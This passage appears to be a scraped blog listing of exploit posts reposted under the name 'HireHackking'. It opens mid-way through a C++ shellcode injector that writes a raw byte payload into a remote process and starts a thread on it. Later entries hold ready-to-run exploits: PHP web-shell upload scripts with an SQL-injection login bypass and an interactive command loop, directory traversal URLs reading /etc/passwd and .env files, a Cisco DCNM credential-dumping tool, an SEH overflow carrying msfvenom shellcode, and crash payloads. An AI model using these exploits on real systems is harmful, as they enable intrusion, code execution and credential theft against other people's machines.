0xec, 0x08, 0x55, 0x48, 0x8b, 0xec, 0x48, 0x8d, 0x64, 0x24, 0xf0, 0x48, 0x8d, 0x05, 0x42, 0x02, 0x00, 0x00, 0x48, 0x89, 0x45, 0xf0, 0x6a, 0x00, 0x8f, 0x45, 0xf8, 0x48, 0x8d, 0x05, 0x3a, 0x02, 0x00, 0x00, 0x48, 0x8d, 0x08, 0x48, 0x8d, 0x55, 0xf0, 0xe8, 0x63, 0x01, 0x00, 0x00, 0xe8, 0xbf, 0x01, 0x00, 0x00, 0xc9, 0xc3, 0x53, 0x56, 0x57, 0x41, 0x54, 0x55, 0x48, 0x8b, 0xec, 0x6a, 0x60, 0x58, 0x65, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x18, 0x48, 0x8b, 0x70, 0x10, 0x48, 0x8b, 0x46, 0x30, 0x48, 0x83, 0xf8, 0x00, 0x74, 0x13, 0xeb, 0x08, 0x4c, 0x8b, 0x06, 0x49, 0x8b, 0xf0, 0xeb, 0xec, 0x45, 0x33, 0xdb, 0x66, 0x45, 0x33, 0xd2, 0xeb, 0x09, 0x33, 0xc0, 0xc9, 0x41, 0x5c, 0x5f, 0x5e, 0x5b, 0xc3, 0x66, 0x8b, 0x46, 0x58, 0x66, 0x44, 0x3b, 0xd0, 0x72, 0x11, 0xeb, 0x3c, 0x66, 0x45, 0x8b, 0xc2, 0x66, 0x41, 0x83, 0xc0, 0x02, 0x66, 0x45, 0x8b, 0xd0, 0xeb, 0xe5, 0x45, 0x8b, 0xcb, 0x41, 0xc1, 0xe9, 0x0d, 0x41, 0x8b, 0xc3, 0xc1, 0xe0, 0x13, 0x44, 0x0b, 0xc8, 0x41, 0x8b, 0xc1, 0x4c, 0x8b, 0x46, 0x60, 0x45, 0x0f, 0xb7, 0xca, 0x4d, 0x03, 0xc1, 0x45, 0x8a, 0x00, 0x45, 0x0f, 0xbe, 0xc0, 0x41, 0x83, 0xf8, 0x61, 0x72, 0x15, 0xeb, 0x07, 0x41, 0x3b, 0xcb, 0x74, 0x16, 0xeb, 0x97, 0x41, 0x83, 0xe8, 0x20, 0x41, 0x03, 0xc0, 0x44, 0x8b, 0xd8, 0xeb, 0xb1, 0x41, 0x03, 0xc0, 0x44, 0x8b, 0xd8, 0xeb, 0xa9, 0x4c, 0x8b, 0x56, 0x30, 0x41, 0x8b, 0x42, 0x3c, 0x4d, 0x8b, 0xe2, 0x4c, 0x03, 0xe0, 0x41, 0x8b, 0x84, 0x24, 0x88, 0x00, 0x00, 0x00, 0x4d, 0x8b, 0xca, 0x4c, 0x03, 0xc8, 0x45, 0x33, 0xdb, 0x41, 0x8b, 0x41, 0x18, 0x44, 0x3b, 0xd8, 0x72, 0x0b, 0xe9, 0x56, 0xff, 0xff, 0xff, 0x41, 0x83, 0xc3, 0x01, 0xeb, 0xec, 0x41, 0x8b, 0x41, 0x20, 0x49, 0x8b, 0xda, 0x48, 0x03, 0xd8, 0x45, 0x8b, 0xc3, 0x48, 0x8b, 0xc3, 0x4a, 0x8d, 0x04, 0x80, 0x8b, 0x00, 0x49, 0x8b, 0xfa, 0x48, 0x03, 0xf8, 0x33, 0xc0, 0x48, 0x8b, 0xdf, 0x48, 0x83, 0xc7, 0x01, 0x44, 0x8a, 0x03, 0x41, 0x0f, 0xbe, 0xd8, 0x83, 0xfb, 0x00, 0x74, 0x02, 0xeb, 0x06, 0x3b, 0xd0, 0x74, 0x17, 0xeb, 0xc1, 0x44, 0x8b, 0xc0, 0x41, 0xc1, 0xe8, 0x0d, 0xc1, 0xe0, 0x13, 0x44, 0x0b, 0xc0, 0x44, 0x03, 0xc3, 0x41, 0x8b, 0xc0, 0xeb, 0xd0, 0x41, 0x8b, 0x41, 0x1c, 0x49, 0x8b, 0xd2, 0x48, 0x03, 0xd0, 0x41, 0x8b, 0x41, 0x24, 0x4d, 0x8b, 0xca, 0x4c, 0x03, 0xc8, 0x45, 0x8b, 0xc3, 0x49, 0x8b, 0xc1, 0x4a, 0x8d, 0x04, 0x40, 0x66, 0x8b, 0x00, 0x0f, 0xb7, 0xc8, 0x48, 0x8b, 0xc2, 0x48, 0x8d, 0x04, 0x88, 0x8b, 0x00, 0x4c, 0x03, 0xd0, 0x49, 0x8b, 0xc2, 0xc9, 0x41, 0x5c, 0x5f, 0x5e, 0x5b, 0xc3, 0x53, 0x56, 0x57, 0x41, 0x54, 0x55, 0x48, 0x8b, 0xec, 0x48, 0x8b, 0xf1, 0x48, 0x8b, 0xda, 0x48, 0x8b, 0x03, 0x48, 0x83, 0xf8, 0x00, 0x74, 0x0e, 0x48, 0x8b, 0xc6, 0x48, 0x83, 0xc6, 0x04, 0x44, 0x8b, 0x20, 0x33, 0xff, 0xeb, 0x07, 0xc9, 0x41, 0x5c, 0x5f, 0x5e, 0x5b, 0xc3, 0x8b, 0x06, 0x41, 0x8b, 0xcc, 0x8b, 0xd0, 0xe8, 0x6b, 0xfe, 0xff, 0xff, 0x48, 0x8b, 0xd0, 0x48, 0x83, 0xfa, 0x00, 0x74, 0x02, 0xeb, 0x06, 0x48, 0x83, 0xc3, 0x08, 0xeb, 0xc5, 0x48, 0x8b, 0x03, 0x48, 0x8b, 0xcf, 0x48, 0x83, 0xc7, 0x01, 0x48, 0x8d, 0x04, 0xc8, 0x48, 0x89, 0x10, 0x48, 0x83, 0xc6, 0x04, 0xeb, 0xcc, 0x57, 0x55, 0x48, 0x8b, 0xec, 0x48, 0x8d, 0xa4, 0x24, 0x78, 0xff, 0xff, 0xff, 0x48, 0x8d, 0xbd, 0x78, 0xff, 0xff, 0xff, 0x32, 0xc0, 0x6a, 0x68, 0x59, 0xf3, 0xaa, 0xc7, 0x85, 0x78, 0xff, 0xff, 0xff, 0x68, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x05, 0x4a, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x10, 0x4c, 0x8d, 0x95, 0x78, 0xff, 0xff, 0xff, 0x48, 0x8d, 0x45, 0xe0, 0x33, 0xc9, 0x45, 0x33, 0xc0, 0x45, 0x33, 0xc9, 0x50, 0x41, 0x52, 0x6a, 0x00, 0x6a, 0x00, 0x6a, 0x00, 0x6a, 0x00, 0x48, 0x8d, 0x64, 0x24, 0xe0, 0x48, 0x8d, 0x05, 0x09, 0x00, 0x00, 0x00, 0xff, 0x10, 0x48, 0x83, 0xc4, 0x50, 0xc9, 0x5f, 0xc3, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x17, 0xca, 0x2b, 0x6e, 0x72, 0xfe, 0xb3, 0x16, 0x00, 0x00, 0x00, 0x00, 0x63, 0x61, 0x6c, 0x63, 0x00 }; if(!WriteProcessMemory( ProcessHandle, ShellcodeAddress, Shellcode, sizeof(Shellcode), nullptr )) { printf("Failed to WriteProcessMemory in the target process (%d) bailing out.", GetLastError()); // // At least clean up the remote process D: // VirtualFreeEx(ProcessHandle, ShellcodeAddress, 0, MEM_RELEASE); return EXIT_FAILURE; } // // Creating a remote thread on the shellcode now. // DWORD ThreadId; HANDLE ThreadHandle = CreateRemoteThread( ProcessHandle, nullptr, 0, ShellcodeAddress, nullptr, 0, &ThreadId ); // // Waiting for the thread to end.. // WaitForSingleObject(ThreadHandle, INFINITE); // // All right, we are done here, let's clean up and exit. // VirtualFreeEx(ProcessHandle, ShellcodeAddress, 0, MEM_RELEASE); printf("Payload has been successfully injected in %d.", SihostPid); return EXIT_SUCCESS; }
  17. HireHackking

    Microsoft Outlook VCF cards - Denial of Service (PoC)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Microsoft Outlook VCF cards - Denial of Service (PoC) # Date: 2020-01-04 # Exploit Author: hyp3rlinx # Vendor Homepage: www.microsoft.com [+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-VCF-MAILTO-LINK-DENIAL-OF-SERVICE.txt [+] twitter.com/hyp3rlinx [+] ISR: ApparitionSec [Vendor] www.microsoft.com [Product] A VCF file is a standard file format for storing contact information for a person or business. Microsoft Outlook supports the vCard and vCalendar features. These are a powerful new approach to electronic Personal Data Interchange (PDI). [Vulnerability Type] Mailto Link Denial Of Service [CVE Reference] N/A [Security Issue] Windows VCF cards do not properly sanitize email addresses allowing for HTML injection. A corrupt VCF card can cause all the users currently opened files and applications to be closed and their session to be terminated without requiring any accompanying attacker supplied code. This can be done by crafting the Mailto link to point to Windows "logoff.exe". The corrupt VCF card can then kill all users applications and also log the target off their computer, if the VCF card is opened in using Windows Contacts and the link is clicked. The logoff.exe executable lives in "C:\Windows\System32" and can terminate applications and log out users without requiring args. This probably will affect Windows 7 the most as Windows 10 can possibly default opening VCF files in other programs like (People). However, users can possibly still choose to open the VCF in Contacts by right-click the file. Note, this exploit requires user interaction. [Exploit/POC] "VCF_DoS.py" dirty_vcf=( 'BEGIN:VCARD\n' 'VERSION:4.0\n' 'FN:Session Terminate PoC - ApparitionSec\n' 'EMAIL:<a href="logoff">DoS@microsoft.com</a>\n' 'END:VCARD') f=open("DoS.vcf", "w") f.write(dirty_vcf) f.close() print "VCF Denial Of Service card created!" print "By hyp3rlinx" [POC Video URL] https://www.youtube.com/watch?v=P4OGN7pZLSg [Network Access] Local [Severity] Medium [Disclosure Timeline] Vendor Notification: January 2, 2020 MSRC : "In order to investigate your report I will need an explanation on how an attacker could use the information to exploit another user remotely without the use of social engineering... As such, this thread is being closed" : January 3, 2020 January 4, 2020 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx
  18. HireHackking

    Voyager 1.3.0 - Directory Traversal

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Voyager 1.3.0 - Directory Traversal # Google Dork: N/A # Date: January 2020-01-06 # Exploit Author: NgoAnhDuc # Vendor Homepage: https://voyager.devdojo.com/ # Software Link:https://github.com/the-control-group/voyager/releases/tag/v1.3.0https://github.com/the-control-group/voyager/releases/tag/v1.2.7 # Version: 1.3.0 and bellow # Tested on: Ubuntu 18.04 # CVE : N/A Vulnerable code is in voyager/src/Http/Controllers/VoyagerController.php ======================================== public function assets(Request $request) { *$path = str_start(str_replace(['../', './'], '', urldecode($request->path)), '/');* * $path = base_path('vendor/tcg/voyager/publishable/assets'.$path);* if (File::exists($path)) { $mime = ''; if (ends_with($path, '.js')) { $mime = 'text/javascript'; } elseif (ends_with($path, '.css')) { $mime = 'text/css'; } else { $mime = File::mimeType($path); } $response = response(File::get($path), 200, ['Content-Type' => $mime]); $response->setSharedMaxAge(31536000); $response->setMaxAge(31536000); $response->setExpires(new \DateTime('+1 year')); return $response; } return response('', 404); } ======================================== PoC: passwd: http://localhost/admin/voyager-assets?path=.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2Fetc/passwd Laravel environment file:http://localhost/admin/voyager-assets?path=.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F<web root dir>/.env
  19. HireHackking

    Complaint Management System 4.0 - Remote Code Execution

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Complaint Management System 4.0 - Remote Code Execution # Exploit Author: Metin Yunus Kandemir # Vendor Homepage: https://phpgurukul.com/ # Software Link: https://phpgurukul.com/complaint-management-sytem/ # Version: v4.0 # Category: Webapps # Tested on: Xampp for Windows # Description: # There isn't any file extension control at the "Register Complaint" section of user panel. # An unauthorized user can upload and execute php file. # Below basic python script will bypass authentication and execute command on target server. poc.py #!/usr/bin/python import requests import sys if len(sys.argv) !=3: print "[*] Usage: PoC.py rhost/rpath command" print "[*] e.g.: PoC.py 127.0.0.1/cms ipconfig" exit(0) rhost = sys.argv[1] command = sys.argv[2] #authentication bypass url = "http://"+rhost+"/users/index.php" data = {"username": "joke' or '1'='1'#", "password": "joke' or '1'='1'#", "submit": ""} with requests.Session() as session: login = session.post(url, data=data, headers = {"Content-Type": "application/x-www-form-urlencoded"}) #check authentication bypass check = session.get("http://"+rhost+"/users/dashboard.php", allow_redirects=False) print ("[*] Status code for login: %s"%check.status_code) if check.status_code == 200: print ("[+] Authentication bypass was successfull") else: print ("[-] Authentication bypass was unsuccessful") sys.exit() #upload php file ufile = {'compfile':('command.php', '<?php system($_GET["cmd"]); ?>')} fdata = {"category": "1", "subcategory": "Online Shopping", "complaintype": " Complaint", "state": "Punjab", "noc": "the end", "complaindetails": "the end","compfile": "commmand.php", "submit": ""} furl = "http://"+rhost+"/users/register-complaint.php" fupload = session.post(url=furl, files= ufile, data=fdata) #execution final=session.get("http://"+rhost+"/users/complaintdocs/command.php?cmd="+command) if final.status_code == 200: print "[+] Command execution completed successfully.\n" print "\tPut on a happy face.\n" else: print "[-] Command execution was unsuccessful." print "\tOne bad day!" sys.exit() print final.text
  20. HireHackking

    AnyDesk 5.4.0 - Unquoted Service Path

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: AnyDesk 5.4.0 - Unquoted Service Path # Exploit Author: SajjadBnd # Date: 2019-12-23 # Vendor Homepage: http://anydesk.com # Software Link: https://download.anydesk.com/AnyDesk.exe # Version: Software Version 5.4.0 # Tested on: Win10 x64 SERVICE_NAME: AnyDesk TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : "C:\Program Files (x86)\AnyDesk\AnyDesk.exe" --service LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : AnyDesk Service DEPENDENCIES : RpcSs SERVICE_START_NAME: LocalSystem
  21. HireHackking

    Cisco DCNM JBoss 10.4 - Credential Leakage

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Cisco DCNM JBoss 10.4 - Credential Leakage # Date: 2020-01-06 # Exploit Author: Harrison Neal # Vendor Homepage: https://www.cisco.com/ # Software Link: https://software.cisco.com/download/home/281722751/type/282088134/release/10.4(2) # Version: 10.4(2) # CVE: CVE-2019-15999 # You'll need a few .jars from a copy of Cisco DCNM to compile and run this code # To compile, file path should match ${package}/${class}.java, e.g., # com/whatdidibreak/dcnm_expl/Main.java # Usage: java -jar PackagedJarFile Victim1IpOrFqdn [victim2 ...] package com.whatdidibreak.dcnm_expl; import com.cisco.dcbu.jaxws.san.ep.DbAdminSEI; import com.cisco.dcbu.jaxws.wo.DBRowDO; import com.cisco.dcbu.lib.util.jboss_4_2.JBoss_4_2Encrypter; import java.util.Properties; import javax.naming.Context; import javax.naming.InitialContext; public class Main { public static void main(String[] args) throws Throwable { for (String target : args) { System.out.println("Target: " + target); Properties jndiProps = new Properties(); jndiProps.put(Context.INITIAL_CONTEXT_FACTORY, "org.jboss.naming.remote.client.InitialContextFactory"); jndiProps.put(Context.PROVIDER_URL, "remote://" + target + ":4447"); jndiProps.put(Context.SECURITY_PRINCIPAL, "admin"); jndiProps.put(Context.SECURITY_CREDENTIALS, "nbv_12345"); jndiProps.put("jboss.naming.client.ejb.context", true); Context ctx = new InitialContext(jndiProps); DbAdminSEI i = (DbAdminSEI) ctx.lookup("dcm/jaxws-dbadmin/DbAdminWS!com.cisco.dcbu.jaxws.san.ep.DbAdminSEI"); for (DBRowDO row : i.getServerProperties(null).getRows()) { String propName = row.getEntry()[0]; String propValue = row.getEntry()[1]; if (propValue.isEmpty()) { continue; } if (propName.contains("user")) { System.out.println(propName + " = " + propValue); } else if (propName.contains("pass")) { System.out.println(propName + " = " + propValue + " (" + JBoss_4_2Encrypter.decrypt(propValue) + ")"); } } System.out.println(); } } }
  22. HireHackking

    Job Portal 1.0 - Remote Code Execution

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Job Portal 1.0 - Remote Code Execution # Google Dork: N/A # Date: 2020-01-03 # Exploit Author: Tib3rius # Vendor Homepage: https://phpgurukul.com/job-portal-project/ # Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=7855 # Version: 1.0 # Tested on: Ubuntu 16.04 # CVE: N/A import argparse import random import requests import string import sys parser = argparse.ArgumentParser() parser.add_argument('url', action='store', help='The URL of the target.') args = parser.parse_args() url = args.url.rstrip('/') random_file = ''.join(random.choice(string.ascii_letters + string.digits) for i in range(10)) payload = '<?php echo shell_exec($_GET[\'cmd\']); ?>' file = {'file': (random_file + '.php', payload, 'text/php')} print('> Attempting to upload PHP web shell...') r = requests.post(url + '/admin/gallery.php', files=file, data={'submit':'1'}, verify=False) print('> Verifying shell upload...') r = requests.get(url + '/admin/uploadimg/' + random_file + '.php', params={'cmd':'echo ' + random_file}, verify=False) if random_file in r.text: print('> Web shell uploaded to ' + url + '/admin/uploadimg/' + random_file + '.php') print('> Example command usage: ' + url + '/admin/uploadimg/' + random_file + '.php?cmd=whoami') launch_shell = str(input('> Do you wish to launch a shell here? (y/n): ')) if launch_shell.lower() == 'y': while True: cmd = str(input('RCE $ ')) if cmd == 'exit': sys.exit(0) r = requests.get(url + '/admin/uploadimg/' + random_file + '.php', params={'cmd':cmd}, verify=False) print(r.text) else: if r.status_code == 200: print('> Web shell uploaded to ' + url + '/admin/uploadimg/' + random_file + '.php, however a simple command check failed to execute. Perhaps shell_exec is disabled? Try changing the payload.') else: print('> Web shell failed to upload! The web server may not have write permissions.')
  23. HireHackking

    piSignage 2.6.4 - Directory Traversal

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: piSignage 2.6.4 - Directory Traversal # Date: 2019-11-13 # Exploit Author: JunYeong Ko # Vendor Homepage: https://pisignage.com/ # Version: piSignage before 2.6.4 # Tested on: piSignage before 2.6.4 # CVE : CVE-2019-20354 Summary: The web application component of piSignage before 2.6.4 allows a remote attacker (authenticated as a low-privilege user) to download arbitrary files from the Raspberry Pi via api/settings/log?file=../ path traversal. In other words, this issue is in the player API for log download. PoC: 1. Click the Log Download button at the bottom of the 'piSignage' administration page. 2. HTTP Packet is sent when the button is pressed. 3. Change the value of 'file' parameter to ../../../../../../../../../../etc/passwd. 4. You can see that the /etc/passwd file is read. References: https://github.com/colloqi/piSignage/issues/97
  24. HireHackking

    Allok Video Converter 4.6.1217 - Stack Overflow (SEH)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Allok Video Converter 4.6.1217 - Stack Overflow (SEH) # Date: 2020-01-12 # Exploit Author: Antonio de la Piedra # Vendor Homepage: https://www.alloksoft.com # Software Link: https://www.alloksoft.com/allok_vconverter.exe # Version: 4.6.1217 # Tested on: Windows 7 SP1 32-bit # Copy paste the contents of poc.txt into the License Name input field # of Allok Video Converter 4.6.1217 to execute calc.exe. nseh_offset = 780 total = 1000 # msfvenom -p windows/exec -b '\x00\x0a\x0d' -f python --var-name shellcode= _calc CMD=calc.exe EXITFUNC=thread shellcode_calc = b"" shellcode_calc += b"\xdd\xc0\xbe\x48\x33\xfd\x23\xd9\x74\x24" shellcode_calc += b"\xf4\x5f\x33\xc9\xb1\x31\x83\xef\xfc\x31" shellcode_calc += b"\x77\x14\x03\x77\x5c\xd1\x08\xdf\xb4\x97" shellcode_calc += b"\xf3\x20\x44\xf8\x7a\xc5\x75\x38\x18\x8d" shellcode_calc += b"\x25\x88\x6a\xc3\xc9\x63\x3e\xf0\x5a\x01" shellcode_calc += b"\x97\xf7\xeb\xac\xc1\x36\xec\x9d\x32\x58" shellcode_calc += b"\x6e\xdc\x66\xba\x4f\x2f\x7b\xbb\x88\x52" shellcode_calc += b"\x76\xe9\x41\x18\x25\x1e\xe6\x54\xf6\x95" shellcode_calc += b"\xb4\x79\x7e\x49\x0c\x7b\xaf\xdc\x07\x22" shellcode_calc += b"\x6f\xde\xc4\x5e\x26\xf8\x09\x5a\xf0\x73" shellcode_calc += b"\xf9\x10\x03\x52\x30\xd8\xa8\x9b\xfd\x2b" shellcode_calc += b"\xb0\xdc\x39\xd4\xc7\x14\x3a\x69\xd0\xe2" shellcode_calc += b"\x41\xb5\x55\xf1\xe1\x3e\xcd\xdd\x10\x92" shellcode_calc += b"\x88\x96\x1e\x5f\xde\xf1\x02\x5e\x33\x8a" shellcode_calc += b"\x3e\xeb\xb2\x5d\xb7\xaf\x90\x79\x9c\x74" shellcode_calc += b"\xb8\xd8\x78\xda\xc5\x3b\x23\x83\x63\x37" shellcode_calc += b"\xc9\xd0\x19\x1a\x87\x27\xaf\x20\xe5\x28" shellcode_calc += b"\xaf\x2a\x59\x41\x9e\xa1\x36\x16\x1f\x60" shellcode_calc += b"\x73\xf8\xfd\xa1\x89\x91\x5b\x20\x30\xfc" shellcode_calc += b"\x5b\x9e\x76\xf9\xdf\x2b\x06\xfe\xc0\x59" shellcode_calc += b"\x03\xba\x46\xb1\x79\xd3\x22\xb5\x2e\xd4" shellcode_calc += b"\x66\xd6\xb1\x46\xea\x37\x54\xef\x89\x47" poc = "" poc += "A"*nseh_offset poc += "\xEB\x0b\x90\x90" # jmp forward (nseh) poc += "\x59\x78\x03\x10" # pop pop ret (seh) poc += "\x90"*20 poc += shellcode_calc poc += "D"*(total - len(poc)) file = open("poc_seh.txt","w") file.write(poc) file.close()
  25. HireHackking

    Top Password Software Dialup Password Recovery 1.30 - Denial of Service (PoC)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Top Password Software Dialup Password Recovery 1.30 - Denial of Service (PoC) # Date: 2020-01-12 # Exploit Author: Antonio de la Piedra # Vendor Homepage: https://www.top-password.com/ # Software Link: https://www.top-password.com/download/DialupPRSetup.exe # Version: 1.30 # Tested on: Windows 7 SP1 32-bit # Copy paste the contents of poc.txt into the # User Name / Registration Code input fields. #!/usr/bin/python poc =3D "A"*5000 file =3D open("poc.txt","w") file.write(poc) file.close()